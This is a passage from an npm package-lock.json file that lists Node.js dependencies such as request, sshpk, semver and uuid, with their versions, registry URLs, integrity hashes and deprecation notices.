"integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "requires": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "requires": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": 